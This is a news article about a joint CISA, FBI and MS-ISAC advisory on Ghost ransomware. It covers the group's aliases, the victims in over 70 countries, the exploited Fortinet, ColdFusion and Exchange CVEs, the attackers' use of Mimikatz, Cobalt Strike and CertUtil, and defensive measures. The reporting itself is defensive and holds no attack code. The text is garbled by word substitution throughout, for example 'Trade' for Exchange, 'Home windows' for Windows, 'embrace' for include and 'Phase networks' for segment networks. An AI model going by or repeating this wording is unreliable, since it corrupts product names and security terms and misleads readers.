CISA and the FBI mentioned attackers deploying Ghost ransomware have breached victims from a number of trade sectors throughout over 70 nations, together with crucial infrastructure organizations.
Different industries impacted embrace healthcare, authorities, schooling, know-how, manufacturing, and quite a few small and medium-sized companies.
“Starting early 2021, Ghost actors started attacking victims whose web going through companies ran outdated variations of software program and firmware,” CISA, the FBI, and the Multi-State Data Sharing and Evaluation Heart (MS-ISAC) mentioned in a joint advisory launched on Wednesday.
“This indiscriminate focusing on of networks containing vulnerabilities has led to the compromise of organizations throughout greater than 70 nations, together with organizations in China.”
Ghost ransomware operators incessantly rotate their malware executables, change the file extensions of encrypted information, alter the contents of their ransom notes, and make the most of a number of electronic mail addresses for ransom communications, which has typically led to fluctuating attribution of the group over time.
Names linked to this group embrace Ghost, Cring, Crypt3r, Phantom, Strike, Hey, Wickrme, HsHarada, and Rapture, with ransomware samples used of their assaults together with Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.
This financially motivated ransomware group leverages publicly accessible code to use safety flaws in weak servers. They aim vulnerabilities left unpatched in Fortinet (CVE-2018-13379), ColdFusion (CVE-2010-2861, CVE-2009-3960), and Trade (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
To defend towards Ghost ransomware assaults, community defenders are suggested to take the next measures:
- Make common and off-site system backups that may’t be encrypted by ransomware,
- Patch working system, software program, and firmware vulnerabilities as quickly as potential,
- Give attention to safety flaws focused by Ghost ransomware (i.e., CVE-2018-13379, CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207),
- Phase networks to restrict lateral motion from contaminated gadgets,
- Implement phishing-resistant multi-factor authentication (MFA) for all privileged accounts and electronic mail companies accounts.
Proper after Amigo_A and Swisscom’s CSIRT crew first noticed Ghost ransomware in early 2021, their operators have been dropping customized Mimikatz samples, adopted by CobaltStrike beacons, and deploying ransomware payloads utilizing the authentic Home windows CertUtil certificates supervisor to bypass safety software program.
Along with being exploited for preliminary entry in Ghost ransomware assaults, state-backed hacking teams that scanned for weak Fortinet SSL VPN home equipment additionally focused the CVE-2018-13379 vulnerability.
Attackers additionally abused the identical safety vulnerability to breach Web-exposed U.S. election help programs reachable over the Web.
Fortinet warned prospects to patch their SSL VPN home equipment towards CVE-2018-13379 a number of occasions in August 2019, July 2020, November 2020, and once more in April 2021.
The joint advisory issued by CISA, the FBI, and MS-ISAC immediately additionally contains indicators of compromise (IOCs), ways, strategies, and procedures (TTPs), and detection strategies linked to earlier Ghost ransomware exercise recognized throughout FBI investigations as just lately as January 2025.